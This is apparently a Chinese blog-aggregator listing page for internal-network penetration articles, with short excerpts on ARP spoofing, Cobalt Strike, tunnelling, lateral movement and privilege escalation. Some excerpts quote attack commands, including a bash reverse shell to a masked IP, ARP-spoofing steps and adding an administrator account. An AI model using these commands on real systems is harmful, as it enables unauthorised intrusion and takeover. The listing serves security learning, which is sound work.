#内网渗透

中国大学生计算机设计大赛之小程序开发全过程

目录前提(一)整个开发流程(二)开发过程中遇到的Bug(1)前端(小程序)(2)后端(主要是中文乱码)(三)涉及的技术1.爬虫技术2.内网渗透(四)比赛经验1.先说说我的一些反思2.比赛心得前提先分享一些我学习小程序的一些网站官方文档
原来是阿中·2020-08-12 16:42

神兵利器--Cobalt Strike

很早之前就接触了Metasploit工具内网渗透非常强大,当时用过CobaltStrike2.0版本主要是结合Metasploit可以称为图形化MSF工
Wh0ale·2020-08-12 15:54

内网渗透之——内网arp欺骗工具使用

原理arp工作原理arp协议是地址解析协议,就是将ip地址解析为mac地址,数据链路层通过mac地址进行通信,arp协议通过广播发送request请求包和接收response响应包来正常工作,请求包是寻找网关,响应包是回复我是网关,我的mac地址是,中间没有身份验证arp欺骗原理主机A通过广播发送request请求包,寻找网关192.168.1.1,此时主机b(非网关的同网段机器)主动回复resp
卖N孩的X火柴·2020-08-12 14:59

Linux的内网渗透入门教程:第一节 通过arp欺骗进行网关劫持,截获别人手机的图片(VMware环境)

其实通过工具进行内网渗透根本就没什么技术含量(emmm…其实可以说根本就没有技术含量,只要不笨,无论学没学过编程
竹宇·2020-08-12 13:54

Linux kali内网渗透之ARP欺骗攻击

ARP欺骗攻击受害主机IP:192.168.20.236攻击主机IP:192.168.20.164网关:192.168.21.254若攻击主机kali是虚拟机,需保证虚拟机的kali是桥接模式第一步,获得攻击机所在网段以及网卡编号以及网关地址第二步,利用zenmap查看同网段下(192.168.20…)的所有活跃IP第三步,将1覆盖写入ip_forward文件中,开启流量转发,这样子发起ARP攻击
Pythonicc·2020-08-12 10:50

内网渗透(1)--arp欺骗攻击

如果只是单向欺骗的话会发现目标主机无法上网,所以可能会被察觉到异常实验原理安装依赖apt-getinstallbridge-utils配置本地无线网卡,开启流量转发,实现连入的设备可以上网首先关闭一些服务,防止影响serviceNetworkManagerstopairmon-ngcheckkill插入网卡并启用airmon-ngstartwlan0把网卡变成一个apairbase-ng--ess
azraelxuemo·2020-08-12 10:58

靶机练习 - ATT&CK红队实战靶场 - 1. 环境搭建和漏洞利用

最近某个公众号介绍了网上的一套环境,这个环境是多个Windows靶机组成的,涉及到内网渗透,正好Windows和内网渗透一直没怎么接触过,所以拿来学习下。
Sally_Zhang·2020-08-11 14:00

渗透测试之权限维持

权限维持在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。
QingChenHT·2020-08-11 10:35

记一次简单的内网渗透

起因本人这次实验过程回公司后连wifi已经相当于进入内网环境→对目标进行端口扫描→存在高危端口139、445(永恒之蓝)、3389(19年RDP)→poc验证存在漏洞并用msf打exp,只成功了一次→对成功的一次把握住机会对222主机添加了账号密码并提升为管理员权限→因为发烧去不了公司,罗哥给了我跳板机→利用跳板机代理流量→访问222机子,下载mimikatz抓取密码→登录到222机子的域身份→发
努力的学渣'#·2020-08-09 01:47

wifi渗透

前言本文主要讲述家庭家庭家庭中(重要的事情说三遍,企业认证服务器的wifi一般非常非常的安全破解不来)如何破解wifi密码,破解wifi密码后的内网渗透利用(简单说明),如何设置wifi路由器更安全,从渗透的方面看
Lmg66·2020-08-08 20:00

小白-网络安全构建基础1

**人生第一次编写——小白(只为自己记录,其他概不负责)**今天学习了网络基础即网络安全架构(交换机的原理及设计)学习这个的目的呢是为之后的内网渗透打下坚实基础,如果之后想要做内网测试就必须进去内网,进入内网就必须要了解网络的基本构建
Xiaobaipig·2020-08-08 13:56

利用WMI代替psexec——WMIEXEC.vbs [安全脉搏更新]

内网渗透中经常用到psexec这个工具,可以很方便的得到一个半交互式的cmdshell。
qq_27446553·2020-08-08 00:53

XCTF WEB 新手练习区001-012 WP

前言转眼大三玩得太离谱,希望能够静心下来学习东西,朝着内网渗透方向去发展。001_view_source直接F12002_get_post如题传参。003_robots根据题目查看robots文件。
李沐子·2020-08-06 11:00

Active Directory(AD)域环境本地测试(外加部分内网渗透命令)

#基本概念活动目录(ActiveDirectory):简单的说,活动目录是实现域环境的一个载体,要想实现一个大型的域环境组织和管理,通过AD可以轻松地实现。AD存储了有关网络对象(objects)的信息,并让管理员和用户都能够很轻松地查找和使用这些信息。AD使用的是一种结构化的数据存储方式,并以此为基础对目录信息进行合乎逻辑的分层组织。林(Forest):一个或多个域树组成了林,同一林中的域可以共
RickGray·2020-08-05 20:40

[安全攻防进阶篇] 四.逆向分析之条件语句和循环语句源码还原及流程控制逆向 (4)

接下来我将开启新的安全系列,叫“安全攻防进阶篇”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透
Eastmount·2020-08-02 21:12

nps内网渗透利用

0x00前言对比了比较多的代理工具,如ew流量不稳定,容易断;frsocks目前免杀,也是容易断。frp需要落地配置文件,不符合渗透的规则。reg正向的socks,速度比较慢,扫描是个问题。其实我最小的诉求就是不需要落地配置文件、稳定不容易断、流量加密。测试了一段时间nps是比较符合要求的。0x01nps搭建下载地址:https://github.com/cnlh/nps/releases服务端配
weixin_30883311·2020-08-02 19:14

内网渗透篇:tunna搭建HTTP正向代理

当你的才华还撑不起你的野心时那你就应该静下心来学习目录tunna搭建HTTP正向代理0x01网络拓扑图0x02操作演示源码传送门•reDuh源码:https://github.com/sensepost/reDuh•reGeorg源码:https://github.com/sensepost/reGeorg•tunna源码:https://github.com/SECFORCE/Tunna续上一章
Agan '·2020-08-02 17:42

内网渗透篇:反弹Shell 骚姿势【总结】

当你的才华还撑不起你的野心时那你就应该静下心来学习目录反弹Shell骚姿势【总结】0x01前奏说明0x02大致环境0x03关于linux平台下弹shell的一些方式第一种方式第二种方式0x04基于不同协议下的shell反弹方式0x05关于win平台下的一些shell反弹方式0x07一一些小结反弹Shell骚姿势【总结】0x01前奏说明很多时候,不到万不得已的情况下,我们完全没必要非往目标机器里传一
Agan '·2020-08-02 12:12

内网渗透篇:反弹shell的N种姿势

当你的才华还撑不起你的野心时那你就应该静下心来学习目录反弹shell的N种姿势0x01前言反弹shell是啥?反弹shell的前因后果0x02本次环境网络拓扑图0x03bash直接反弹介绍0x04利用nc0x05利用msfvenom具体语言实现0x06分析下这段脚本的内容参考链接:反弹shell各种姿势的备忘录http://pentestmonkey.net/cheat-sheet/shells/
Agan '·2020-08-02 12:12

内网渗透:步步为营游走于内网

开始主要是思路0X01InitialAccess入口点1、WebShell2、个人机Becaon3、水坑4、网络设备5、物理渗透:无人机WIFI破解,进内网,甚至做到了超算区域。等等。判断位置:当我们获得shell的时候,需要判断当前的位置在哪里网络区域:外网、DMZ、内网、办公网、生产网、运维网。名字叫法根据单位性质不同,叫法可能不一样。一般拿下Webshell都是在DMZ区,DMZ的区域限制都
prettyX·2020-08-01 14:53

natapp内网渗透,linux下后台运行,能显示免费隧道的域名和端口号哦

自己亲测可用哦,1.https://natapp.cn/官网下载所需版本,并注册,配置自己的免费隧道2.下载完毕后,把natapp_linux_amd64_2_3_9.zip上传到/usr/local/natapp文件夹下使用命令解压:unzipnatapp_linux_amd64_2_3_9.zip(如果没有安装解压包,yuminstall-yunzipzip)命令解压解压完毕后为natapp添
sort浅忆·2020-08-01 13:07

内网渗透之隐藏隧道技术

个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)隐藏隧道技术即是,绕过端口屏蔽的通信方式判断内网连通性imcpping[ip]tcpnc-zv[ip][port]httpcurl支持文件上传和下载等
想冲大厂的癞蛤蟆·2020-08-01 11:58

内网渗透篇】SQLMap 详解所有参数【Micro8】

当你的才华还撑不起你的野心时那你就应该静下心来学习目录【内网渗透篇】SQLMap详解所有参数【Micropoor】1、Options(选项)2、Target(目标)3、Request(请求)4、Optimization
Agan '·2020-08-01 10:18

内网渗透思路整理与工具使用

因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的知识,看了不少大牛的文章,膜拜之余还是做了一些笔记的。
FLy_鹏程万里·2020-08-01 10:11

一次实战环境横向内网渗透记录

目标是将该文件取出并不被发现已有条件:(1)你已经进入了内网中(2)四个已知ip:10.21.48.7010.21.48.7210.21.48.7310.21.48.75(3)攻击机kali:10.21.48.58/内网渗透过程
p0wer$hell·2020-08-01 10:24

提权与内网渗透

权限在不同的应用中有不同的分类,安全相关的大致分为以下几种1.匿名访问权限2.来宾权限3.用户权限4.管理员权限5.系统权限电脑常见的的权限分为用户权限和管理员权限例如普通用户权限会有很多限制,例如无法执行某些程序以及服务Window基础命令queryuser#查看用户登录情况whoami#查看当前用户权限systeminfo#查看当前系统版本与补丁信息添加普通用户netusermyuser123
Victor.Zhang·2020-08-01 09:37

记一次实战学校内网渗透

前言上次记录过一篇提权到内网初探,但感觉收尾有些仓促,最近刚好遇到了很好的实战过程,故本篇为过程记录复现,着重围绕着目标进行测试。希望看完本篇能给您带来一些思路或启发。假设本次测试前提为:仅知道刘书源为某学校的学生,目的是尽可能的收集刘书源的信息,以此进行展开。PS:截至投稿前,已将漏洞提交eduSRC平台并验证已完成修复。内网资产嗅探首先通过谷歌语法搜索该学校的学号。这是个众人皆知的小技巧,通过
合天智汇·2020-08-01 09:48

内网渗透----域内横向移动

0x01.MS14-068kerkeo工具https://github.com/gentilkiwi/kekeo)klistklistpurge删除所有票据直接访问域控制器的C盘目录:dir\\qianxiao996-dm.qianxiao996.com\C$查看本机用户信息,记录用户名与SID号whoami/allSID:S-1-5-21-2461438818-3229013638-412691
浅笑⁹⁹⁶·2020-08-01 09:43

WMI横向移动

因此在内网渗透中,我们可以使用WMI进行横向移动。利用条件1、WMI服务开启,端口135,默认开启。2、防火墙允许135、445等端口通信。
`GGyao·2020-08-01 09:35

内网渗透之常见隧道转发划水以至于溺水技术。

内网渗透之常见隧道转发划水以至于溺水技术越过山丘,才发现无人等候。
SoulCat.·2020-08-01 09:03

【横向移动】内网渗透横向移动获取另台主机的shell

目录一、前言二、实验环境:三、实验目的:四、实验操作:实验准备:计划任务:At计划任务:schtasks计划任务:Psexec横向移动:Windows:Kalimsf:wmic横向移动wmiexec.vbs脚本横向移动:1、半交互模式2、单命令执行一、前言在攻击者获取到某台内网机器的控制权限之后,进一步会考虑如何在内网进行横向移动,以及攻击域控服务器,本文总结了突破边界后进一步的攻击技巧,拿到内网
浮生若梦 若梦非梦·2020-08-01 09:51

内网渗透测试:内网信息收集与上传下载

隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础。可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。
天府云创·2020-07-31 13:02

[安全攻防进阶篇] 二.如何学好逆向分析、逆向路线推荐及吕布传游戏逆向案例 (2)

接下来我将开启新的安全系列,叫“安全攻防进阶篇”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透
Eastmount·2020-07-31 11:18

[安全攻防进阶篇] 三.OllyDbg和Cheat Engine工具逆向分析植物大战僵尸游戏 (3)

接下来我将开启新的安全系列,叫“安全攻防进阶篇”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透
Eastmount·2020-07-31 11:15

1.我所了解的内网渗透

最近看了一点内网渗透的学习资料,感觉内网渗透需要的知识太多,遂写博客来记录下自己学习内网渗透的一些笔记。
weixin_30496431·2020-07-31 10:04

nmap探测大网络空间中的存活主机

有这样的情形:内网渗透攻击者单点突破,进入内网后,需进一步扩大成果,可以先扫描整个私有网络空间,发现哪些主机是有利用价值的,例如10.1.1.1/8,172.16.1.1/12,192.168.1.1/
简书超级会员·2020-07-30 23:18

内网渗透测试:隐藏通讯隧道技术(下)

什么是隧道?在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。上一节中,我们讲解了网络层的
whatday·2020-07-30 19:59

内网渗透测试:隐藏通讯隧道技术(上)

什么是隧道?在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。常用的隧道技术有以下三种:网
whatday·2020-07-30 19:46

从外网到内网的渗透姿势分享

因为本人比较菜,所以只能做一点比较基础的总结,大佬们请忽略吧...渗透的大体过程整个渗透测试的流程就是通过信息收,集到外网的web漏洞挖掘,来获取一个webshell,通过这个shell进一步利用来打进内网,进行内网渗透
abc380620175·2020-07-30 07:38

初始内网渗透(二)

前言在测试某授权网站时发现该系统存在S2-016漏洞。S2-016查看文件发现对应不上访问的域名。选择使用linux反弹shell的方式获取会话。。通过文件上传写入bash语句,执行后来反弹shell。上传到指定路径并执行。在自己公网服务器上使用nc开始监听。。nc公网IP:nc-lvp8080bash反弹:bash-i>&/dev/tcp/xxx.xxx.xxx.xxx/80800>&1这样就可
CSeroad·2020-07-30 06:39

nmap脚本使用总结

具体链接:http://drops.wooyun.org/tips/2002本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。
Boxing_moose·2020-07-29 11:48

nmap脚本

具体链接:http://drops.wooyun.org/tips/2002本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。
hackerie·2020-07-29 10:07

[安全攻防进阶篇] 一.什么是逆向分析、逆向分析应用及经典扫雷游戏逆向 (1)

接下来我将开启新的安全系列,叫“安全攻防进阶篇”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透
Eastmount·2020-07-29 08:28

linux下内网端口转发工具:linux版lcx 使用方法

这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。
fsrm01·2020-07-29 07:07

从webshell开始的内网入侵

一次完整的从webshell到域控的探索之路正文开始:大体思路:免杀payload的生成,请使用Veilmsf在meterpreter下的提权尝试msf在meterpreter下的bypassuac尝试内网渗透测试过程中的信息关联
逝之君·2020-07-29 02:57

渗透测试系列之iis解析漏洞getshell+内网渗透

本次渗透测试经验分享仅供大家学习交流本次利用的环境为内网web服务器windows2003(模拟内网主机ip192.168.152.128192.168.79.128)一台外网主机(ipxxx.xxx.xxx.xxx)若干个内网主机攻击机win7win10环境搭建:内网web服务器通过端口映射web服务到外网主机测试思路:通过拿到外网ipweb权限进而渗透内网,在内网中寻找存储游戏源码的主机,拿到
win176489·2020-07-28 23:46

渗透测试职业规划-三省吾身

先上一波总结:l至少需要本科学历及三年左右经验l必须要有自己擅长(精通)的方向l渗透测试和代码审计或内网渗透是核心技能一省核心技能有没有都具备?
white-night·2020-07-28 11:33

内网渗透-权限提升(使用MSF提权的一些方法)

讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法,认真看好吗弟弟!!!其他提权方法1.直接输入提升权限命令meterpreter>getsystem2.使用MSF内置bypassuac提权MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。searchbypassuacMatchin
Ping_Pig·2020-07-15 18:23

内网渗透

寻找目标主机ifconfig接下来扫描内网中的主机:nmap-sP172.17.171.0/24使用以下命令来查看目标主机的操作系统信息:nmap-O172.17.171.21进行arp欺骗,获取流量开启流量转发功能使流量经过流程为:A是路由器,B是攻击主机,C是目标主机。1.首先开启流量转发功能:echo1>>/proc/sys/net/ipv4/ip_forward2.使用arpspoof/e
Indexcsdn·2020-07-15 17:20

小白必读记——内网渗透之SQL注入基本原理和攻击(超级详细的哦)(一)

前言在对信息安全的学习中,我们要时刻保持好奇心,多问为什么,要多去探究根本原理,而不是只会使用工具和死记硬背,遇到不会又搜不到答案的问题,我们要大胆猜想,小心求证,只有这样我们才能不断的进步,在信息安全的领域越走越远重要部分请大家多读几遍o!Web入侵先遣—SQL注入攻击技术初探了解TA的前世今生SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,是由于程序员在编
太白神羽酒·2020-07-15 09:33
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他